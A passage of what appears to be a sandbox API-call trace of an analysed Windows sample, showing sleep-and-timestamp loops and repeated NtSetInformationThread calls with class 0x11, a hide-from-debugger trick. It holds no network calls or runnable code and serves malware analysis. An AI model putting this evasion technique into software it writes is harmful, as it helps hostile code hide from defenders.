lpSystemTime=0x106f85c*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x12, wSecond=0x3, wMilliseconds=0x2f6)) [0092.708] Sleep (dwMilliseconds=0x3e8) [0093.722] Sleep (dwMilliseconds=0x3e8) [0094.737] GetLocalTime (in: lpSystemTime=0x106f85c | out: lpSystemTime=0x106f85c*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x12, wSecond=0x5, wMilliseconds=0x312)) [0094.737] Sleep (dwMilliseconds=0x3e8) [0095.751] Sleep (dwMilliseconds=0x3e8) [0096.779] GetLocalTime (in: lpSystemTime=0x106f85c | out: lpSystemTime=0x106f85c*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x12, wSecond=0x7, wMilliseconds=0x32e)) [0096.779] Sleep (dwMilliseconds=0x3e8) [0097.793] Sleep (dwMilliseconds=0x3e8) [0099.354] GetLocalTime (in: lpSystemTime=0x106f85c | out: lpSystemTime=0x106f85c*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x12, wSecond=0x9, wMilliseconds=0x34a)) [0099.354] Sleep (dwMilliseconds=0x3e8) [0100.666] Sleep (dwMilliseconds=0x3e8) [0108.655] GetLocalTime (in: lpSystemTime=0x106f85c | out: lpSystemTime=0x106f85c*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x12, wSecond=0xb, wMilliseconds=0x366)) [0108.655] Sleep (dwMilliseconds=0x3e8) [0109.872] Sleep (dwMilliseconds=0x3e8) [0110.882] GetLocalTime (in: lpSystemTime=0x106f85c | out: lpSystemTime=0x106f85c*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x12, wSecond=0xd, wMilliseconds=0x391)) [0110.882] Sleep (dwMilliseconds=0x3e8) [0111.895] Sleep (dwMilliseconds=0x3e8) [0113.800] GetLocalTime (in: lpSystemTime=0x106f85c | out: lpSystemTime=0x106f85c*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x12, wSecond=0xf, wMilliseconds=0x3bd)) [0113.800] Sleep (dwMilliseconds=0x3e8) [0114.858] Sleep (dwMilliseconds=0x3e8) [0116.530] GetLocalTime (in: lpSystemTime=0x106f85c | out: lpSystemTime=0x106f85c*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x12, wSecond=0x12, wMilliseconds=0x290)) [0116.530] Sleep (dwMilliseconds=0x3e8) [0118.388] Sleep (dwMilliseconds=0x3e8) [0120.339] GetLocalTime (in: lpSystemTime=0x106f85c | out: lpSystemTime=0x106f85c*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x12, wSecond=0x15, wMilliseconds=0x384)) [0120.339] Sleep (dwMilliseconds=0x3e8) [0123.306] Sleep (dwMilliseconds=0x3e8) [0128.157] GetLocalTime (in: lpSystemTime=0x106f85c | out: lpSystemTime=0x106f85c*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x12, wSecond=0x1b, wMilliseconds=0x1a7)) [0128.157] Sleep (dwMilliseconds=0x3e8) [0131.022] Sleep (dwMilliseconds=0x3e8) [0133.815] GetLocalTime (in: lpSystemTime=0x106f85c | out: lpSystemTime=0x106f85c*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x12, wSecond=0x20, wMilliseconds=0x289)) [0133.815] Sleep (dwMilliseconds=0x3e8) [0136.400] Sleep (dwMilliseconds=0x3e8) [0139.230] GetLocalTime (in: lpSystemTime=0x106f85c | out: lpSystemTime=0x106f85c*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x12, wSecond=0x25, wMilliseconds=0x1f4)) [0139.230] Sleep (dwMilliseconds=0x3e8) [0141.678] Sleep (dwMilliseconds=0x3e8) [0144.272] GetLocalTime (in: lpSystemTime=0x106f85c | out: lpSystemTime=0x106f85c*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x12, wSecond=0x2a, wMilliseconds=0x122)) [0144.272] Sleep (dwMilliseconds=0x3e8) [0145.384] Sleep (dwMilliseconds=0x3e8) [0146.943] GetLocalTime (in: lpSystemTime=0x106f85c | out: lpSystemTime=0x106f85c*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x12, wSecond=0x2c, wMilliseconds=0x360)) [0146.943] Sleep (dwMilliseconds=0x3e8) [0148.474] Sleep (dwMilliseconds=0x3e8) [0151.033] GetLocalTime (in: lpSystemTime=0x106f85c | out: lpSystemTime=0x106f85c*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x12, wSecond=0x30, wMilliseconds=0x2e)) [0151.033] Sleep (dwMilliseconds=0x3e8) [0153.040] Sleep (dwMilliseconds=0x3e8) [0154.541] GetLocalTime (in: lpSystemTime=0x106f85c | out: lpSystemTime=0x106f85c*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x12, wSecond=0x32, wMilliseconds=0x2ba)) [0154.541] Sleep (dwMilliseconds=0x3e8) [0156.184] Sleep (dwMilliseconds=0x3e8) [0157.842] GetLocalTime (in: lpSystemTime=0x106f85c | out: lpSystemTime=0x106f85c*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x12, wSecond=0x35, wMilliseconds=0x13f)) [0157.842] Sleep (dwMilliseconds=0x3e8) [0158.910] Sleep (dwMilliseconds=0x3e8) [0160.737] GetLocalTime (in: lpSystemTime=0x106f85c | out: lpSystemTime=0x106f85c*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x12, wSecond=0x37, wMilliseconds=0x199)) [0160.737] Sleep (dwMilliseconds=0x3e8) [0161.828] Sleep (dwMilliseconds=0x3e8) [0165.691] GetLocalTime (in: lpSystemTime=0x106f85c | out: lpSystemTime=0x106f85c*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x12, wSecond=0x39, wMilliseconds=0x2be)) [0165.691] Sleep (dwMilliseconds=0x3e8) [0166.964] Sleep (dwMilliseconds=0x3e8) [0169.183] GetLocalTime (in: lpSystemTime=0x106f85c | out: lpSystemTime=0x106f85c*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x13, wSecond=0x0, wMilliseconds=0x3d2)) [0169.183] Sleep (dwMilliseconds=0x3e8) [0171.133] Sleep (dwMilliseconds=0x3e8) [0172.809] GetLocalTime (in: lpSystemTime=0x106f85c | out: lpSystemTime=0x106f85c*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x13, wSecond=0x3, wMilliseconds=0x2f3)) [0172.809] Sleep (dwMilliseconds=0x3e8) [0174.511] Sleep (dwMilliseconds=0x3e8) [0175.998] GetLocalTime (in: lpSystemTime=0x106f85c | out: lpSystemTime=0x106f85c*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x13, wSecond=0x6, wMilliseconds=0x39a)) [0175.998] Sleep (dwMilliseconds=0x3e8) [0178.971] Sleep (dwMilliseconds=0x3e8) [0180.052] GetLocalTime (in: lpSystemTime=0x106f85c | out: lpSystemTime=0x106f85c*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x13, wSecond=0xa, wMilliseconds=0xa7)) [0180.052] Sleep (dwMilliseconds=0x3e8) [0181.331] Sleep (dwMilliseconds=0x3e8) [0182.690] GetLocalTime (in: lpSystemTime=0x106f85c | out: lpSystemTime=0x106f85c*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x13, wSecond=0xc, wMilliseconds=0x239)) [0182.690] Sleep (dwMilliseconds=0x3e8) [0184.747] Sleep (dwMilliseconds=0x3e8) [0185.856] GetLocalTime (in: lpSystemTime=0x106f85c | out: lpSystemTime=0x106f85c*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x13, wSecond=0xf, wMilliseconds=0x2e0)) [0185.856] Sleep (dwMilliseconds=0x3e8) [0187.462] Sleep (dwMilliseconds=0x3e8) [0188.544] GetLocalTime (in: lpSystemTime=0x106f85c | out: lpSystemTime=0x106f85c*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x13, wSecond=0x12, wMilliseconds=0x1a3)) [0188.544] Sleep (dwMilliseconds=0x3e8) [0189.690] Sleep (dwMilliseconds=0x3e8) [0190.858] GetLocalTime (in: lpSystemTime=0x106f85c | out: lpSystemTime=0x106f85c*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x13, wSecond=0x14, wMilliseconds=0x2d8)) [0190.858] Sleep (dwMilliseconds=0x3e8) [0192.138] Sleep (dwMilliseconds=0x3e8) [0193.359] GetLocalTime (in: lpSystemTime=0x106f85c | out: lpSystemTime=0x106f85c*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x13, wSecond=0x17, wMilliseconds=0xe0)) [0193.359] Sleep (dwMilliseconds=0x3e8) [0194.560] Sleep (dwMilliseconds=0x3e8) [0195.901] GetLocalTime (in: lpSystemTime=0x106f85c | out: lpSystemTime=0x106f85c*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x13, wSecond=0x19, wMilliseconds=0x2ff)) [0195.902] Sleep (dwMilliseconds=0x3e8) [0197.052] Sleep (dwMilliseconds=0x3e8) [0198.317] GetLocalTime (in: lpSystemTime=0x106f85c | out: lpSystemTime=0x106f85c*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x13, wSecond=0x1c, wMilliseconds=0xa9)) [0198.317] Sleep (dwMilliseconds=0x3e8) [0199.493] Sleep (dwMilliseconds=0x3e8) [0200.757] GetLocalTime (in: lpSystemTime=0x106f85c | out: lpSystemTime=0x106f85c*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x13, wSecond=0x1e, wMilliseconds=0x25b)) [0200.757] Sleep (dwMilliseconds=0x3e8) [0201.885] Sleep (dwMilliseconds=0x3e8) [0203.125] GetLocalTime (in: lpSystemTime=0x106f85c | out: lpSystemTime=0x106f85c*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x13, wSecond=0x20, wMilliseconds=0x39f)) [0203.125] Sleep (dwMilliseconds=0x3e8) [0204.279] Sleep (dwMilliseconds=0x3e8) [0205.566] GetLocalTime (in: lpSystemTime=0x106f85c | out: lpSystemTime=0x106f85c*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x13, wSecond=0x23, wMilliseconds=0x159)) [0205.566] Sleep (dwMilliseconds=0x3e8) [0206.681] Sleep (dwMilliseconds=0x3e8) [0207.773] GetLocalTime (in: lpSystemTime=0x106f85c | out: lpSystemTime=0x106f85c*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x13, wSecond=0x25, wMilliseconds=0x230)) [0207.773] Sleep (dwMilliseconds=0x3e8) [0208.880] Sleep (dwMilliseconds=0x3e8) [0209.978] GetLocalTime (in: lpSystemTime=0x106f85c | out: lpSystemTime=0x106f85c*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x13, wSecond=0x27, wMilliseconds=0x2f8)) [0209.978] Sleep (dwMilliseconds=0x3e8) [0211.049] Sleep (dwMilliseconds=0x3e8) [0212.203] GetLocalTime (in: lpSystemTime=0x106f85c | out: lpSystemTime=0x106f85c*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x13, wSecond=0x29, wMilliseconds=0x3df)) [0212.203] Sleep (dwMilliseconds=0x3e8) [0213.342] Sleep (dwMilliseconds=0x3e8) [0214.537] GetLocalTime (in: lpSystemTime=0x106f85c | out: lpSystemTime=0x106f85c*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x13, wSecond=0x2c, wMilliseconds=0x13b)) [0214.537] Sleep (dwMilliseconds=0x3e8) [0216.037] Sleep (dwMilliseconds=0x3e8) Thread: id = 3 os_tid = 0xa44 [0053.770] SysReAllocStringLen (in: pbstr=0x334fa5c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x334fa5c*="KERNEL32.DLL") returned 1 [0053.770] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0053.770] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0053.773] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0053.773] SysReAllocStringLen (in: pbstr=0x334fa5c*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x334fa5c*="KERNEL32.DLL") returned 1 [0053.773] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0053.774] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0053.776] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0053.776] SysReAllocStringLen (in: pbstr=0x334fa38*=0x0, psz="KERNEL32.DLL", len=0xc | out: pbstr=0x334fa38*="KERNEL32.DLL") returned 1 [0053.776] CharLowerBuffW (in: lpsz="KERNEL32.DLL", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0053.776] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0053.779] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0053.781] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0053.781] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x11, wSecond=0x20, wMilliseconds=0x3a)) [0053.782] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0053.782] GetProcAddress (hModule=0x77c40000, lpProcName="NtSetInformationThread") returned 0x77c5f99c [0053.782] GetCurrentThread () returned 0xfffffffe [0053.782] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0053.782] GetTickCount () returned 0x1147291 [0053.782] Sleep (dwMilliseconds=0x3e8) [0055.954] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x11, wSecond=0x21, wMilliseconds=0x48)) [0055.954] GetTickCount () returned 0x1147687 [0055.954] Sleep (dwMilliseconds=0x3e8) [0056.968] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x11, wSecond=0x22, wMilliseconds=0x56)) [0056.968] GetTickCount () returned 0x1147a7d [0056.968] Sleep (dwMilliseconds=0x3e8) [0057.982] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x11, wSecond=0x23, wMilliseconds=0x64)) [0057.982] GetTickCount () returned 0x1147e73 [0057.982] Sleep (dwMilliseconds=0x3e8) [0058.996] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x11, wSecond=0x24, wMilliseconds=0x72)) [0058.996] GetTickCount () returned 0x1148269 [0058.996] Sleep (dwMilliseconds=0x3e8) [0060.029] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x11, wSecond=0x25, wMilliseconds=0x90)) [0060.029] GetTickCount () returned 0x114866f [0060.029] Sleep (dwMilliseconds=0x3e8) [0062.318] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x11, wSecond=0x26, wMilliseconds=0xae)) [0062.318] GetTickCount () returned 0x1148a75 [0062.319] Sleep (dwMilliseconds=0x3e8) [0063.473] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x11, wSecond=0x27, wMilliseconds=0xdb)) [0063.473] GetTickCount () returned 0x1148e8a [0063.473] Sleep (dwMilliseconds=0x3e8) [0064.659] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x11, wSecond=0x28, wMilliseconds=0xe9)) [0064.659] GetTickCount () returned 0x1149280 [0064.659] Sleep (dwMilliseconds=0x3e8) [0065.704] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x11, wSecond=0x29, wMilliseconds=0x116)) [0065.704] GetTickCount () returned 0x1149695 [0065.704] Sleep (dwMilliseconds=0x3e8) [0066.718] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x11, wSecond=0x2a, wMilliseconds=0x124)) [0066.718] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0066.719] GetProcAddress (hModule=0x77c40000, lpProcName="NtSetInformationThread") returned 0x77c5f99c [0066.719] GetCurrentThread () returned 0xfffffffe [0066.719] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0066.719] GetTickCount () returned 0x1149a8b [0066.719] Sleep (dwMilliseconds=0x3e8) [0067.732] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x11, wSecond=0x2b, wMilliseconds=0x132)) [0067.732] GetTickCount () returned 0x1149e81 [0067.732] Sleep (dwMilliseconds=0x3e8) [0068.746] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x11, wSecond=0x2c, wMilliseconds=0x140)) [0068.746] GetTickCount () returned 0x114a277 [0068.746] Sleep (dwMilliseconds=0x3e8) [0069.775] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x11, wSecond=0x2d, wMilliseconds=0x15e)) [0069.775] GetTickCount () returned 0x114a67d [0069.775] Sleep (dwMilliseconds=0x3e8) [0070.790] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x11, wSecond=0x2e, wMilliseconds=0x16c)) [0070.790] GetTickCount () returned 0x114aa73 [0070.790] Sleep (dwMilliseconds=0x3e8) [0071.804] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x11, wSecond=0x2f, wMilliseconds=0x17a)) [0071.804] GetTickCount () returned 0x114ae69 [0071.804] Sleep (dwMilliseconds=0x3e8) [0072.833] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x11, wSecond=0x30, wMilliseconds=0x197)) [0072.833] GetTickCount () returned 0x114b26e [0072.833] Sleep (dwMilliseconds=0x3e8) [0073.863] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x11, wSecond=0x31, wMilliseconds=0x1b5)) [0073.863] GetTickCount () returned 0x114b674 [0073.863] Sleep (dwMilliseconds=0x3e8) [0074.909] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x11, wSecond=0x32, wMilliseconds=0x1e2)) [0074.909] GetTickCount () returned 0x114ba89 [0074.909] Sleep (dwMilliseconds=0x3e8) [0075.922] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x11, wSecond=0x33, wMilliseconds=0x1f0)) [0075.922] GetTickCount () returned 0x114be7f [0075.922] Sleep (dwMilliseconds=0x3e8) [0076.936] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x11, wSecond=0x34, wMilliseconds=0x1fe)) [0076.937] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0076.937] GetProcAddress (hModule=0x77c40000, lpProcName="NtSetInformationThread") returned 0x77c5f99c [0076.937] GetCurrentThread () returned 0xfffffffe [0076.937] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0076.938] GetTickCount () returned 0x114c275 [0076.938] Sleep (dwMilliseconds=0x3e8) [0077.981] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x11, wSecond=0x35, wMilliseconds=0x22b)) [0077.981] GetTickCount () returned 0x114c68a [0077.981] Sleep (dwMilliseconds=0x3e8) [0079.044] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x11, wSecond=0x36, wMilliseconds=0x268)) [0079.044] GetTickCount () returned 0x114caaf [0079.044] Sleep (dwMilliseconds=0x3e8) [0080.868] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x11, wSecond=0x37, wMilliseconds=0x276)) [0080.868] GetTickCount () returned 0x114cea5 [0080.868] Sleep (dwMilliseconds=0x3e8) [0081.882] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x11, wSecond=0x38, wMilliseconds=0x284)) [0081.882] GetTickCount () returned 0x114d29b [0081.882] Sleep (dwMilliseconds=0x3e8) [0085.395] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x11, wSecond=0x39, wMilliseconds=0x292)) [0085.395] GetTickCount () returned 0x114d691 [0085.395] Sleep (dwMilliseconds=0x3e8) [0087.630] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x11, wSecond=0x3a, wMilliseconds=0x2b0)) [0087.630] GetTickCount () returned 0x114da97 [0087.630] Sleep (dwMilliseconds=0x3e8) [0088.637] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x11, wSecond=0x3b, wMilliseconds=0x2be)) [0088.637] GetTickCount () returned 0x114de8d [0088.637] Sleep (dwMilliseconds=0x3e8) [0089.665] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x12, wSecond=0x0, wMilliseconds=0x2cc)) [0089.666] GetTickCount () returned 0x114e283 [0089.666] Sleep (dwMilliseconds=0x3e8) [0090.680] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x12, wSecond=0x1, wMilliseconds=0x2da)) [0090.681] GetTickCount () returned 0x114e679 [0090.681] Sleep (dwMilliseconds=0x3e8) [0091.694] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x12, wSecond=0x2, wMilliseconds=0x2e8)) [0091.696] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0091.696] GetProcAddress (hModule=0x77c40000, lpProcName="NtSetInformationThread") returned 0x77c5f99c [0091.696] GetCurrentThread () returned 0xfffffffe [0091.696] NtSetInformationThread (ThreadHandle=0xfffffffe, ThreadInformationClass=0x11, ThreadInformation=0x0, ThreadInformationLength=0x0) returned 0x0 [0091.697] GetTickCount () returned 0x114ea6f [0091.697] Sleep (dwMilliseconds=0x3e8) [0092.708] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x12, wSecond=0x3, wMilliseconds=0x2f6)) [0092.708] GetTickCount () returned 0x114ee65 [0092.708] Sleep (dwMilliseconds=0x3e8) [0093.722] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x12, wSecond=0x4, wMilliseconds=0x304)) [0093.722] GetTickCount () returned 0x114f25b [0093.722] Sleep (dwMilliseconds=0x3e8) [0094.737] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x12, wSecond=0x5, wMilliseconds=0x312)) [0094.737] GetTickCount () returned 0x114f651 [0094.737] Sleep (dwMilliseconds=0x3e8) [0095.751] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x12, wSecond=0x6, wMilliseconds=0x320)) [0095.751] GetTickCount () returned 0x114fa47 [0095.751] Sleep (dwMilliseconds=0x3e8) [0096.779] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x12, wSecond=0x7, wMilliseconds=0x32e)) [0096.779] GetTickCount () returned 0x114fe3d [0096.780] Sleep (dwMilliseconds=0x3e8) [0097.794] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x12, wSecond=0x8, wMilliseconds=0x33c)) [0097.794] GetTickCount () returned 0x1150233 [0097.794] Sleep (dwMilliseconds=0x3e8) [0099.353] GetLocalTime (in: lpSystemTime=0x334fe24 | out: lpSystemTime=0x334fe24*(wYear=0x7e4, wMonth=0xa, wDayOfWeek=0x3, wDay=0xe, wHour=0x14, wMinute=0x12, wSecond=0x9, wMilliseconds=0x34a)) [0099.354] 